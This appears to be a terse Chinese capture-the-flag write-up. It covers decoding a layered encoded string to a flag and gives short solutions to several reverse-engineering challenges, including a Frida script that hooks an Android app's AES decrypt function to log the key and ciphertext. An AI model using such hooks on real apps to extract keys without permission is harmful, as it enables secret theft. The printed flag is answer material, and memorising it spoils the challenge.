1ZVeWRHOWhSa2w2WVVoQ1ZtSlVWa1JYVmxwaFpFZE9SbHBIYUdsV2JIQktWbTB3TVZNeFVuTlhibEpXWWtkNFdGUlZaRk5rYkZsNFYyNU9hMUl4V2tkYVJXUjNWR3hhYzJORVVsZFdiVTQwVldwR2ExSXhUblZWYlhoVVVqTm9XVlpHWXpGVmJWRjRWMjVHVWxkSGFGaFVWM014VTBac2NsZHNaR2hXYTNCNldXdFNUMVl5U2xWU1ZFSllWbTFTVDFwVlduZFRWbEp6WVVkc1UySklRbHBXYlRCNFRVZFJkMDVXWkZoaVJuQlpXVlJHZDFWV1duUmtSWFJXVFZaYVNGWldhR3RWVmxaVlRVUnJQUT09
解 base64
atbash_cipher 和 string_reverserever
ntio{lmi8i56k1lkn73im7ni75k52in41jj70}
Caesar 8
flag{dea8a56c1dcf73ae7fa75c52af41bb70}
# Reverse
# BabyRe
赛博厨子嗦哈
# TEA
不知道啥情况,打开就是 flag,试了,还真是
# EasyRe
自带解密函数
Java.perform(function () {
var aESUtils =Java.use("com.example.easyre.AESUtils");
aESUtils.decrypt.implementation=function (a,b){
console.log("miwen:",a);
console.log("key", b);
var srcret = this.decrypt(a,b);
console.log("加密后:",srcret);
return srcret;
}
});
hook 出来然后直接看密文
base64 解密
# GORC
动调出 key
直接解密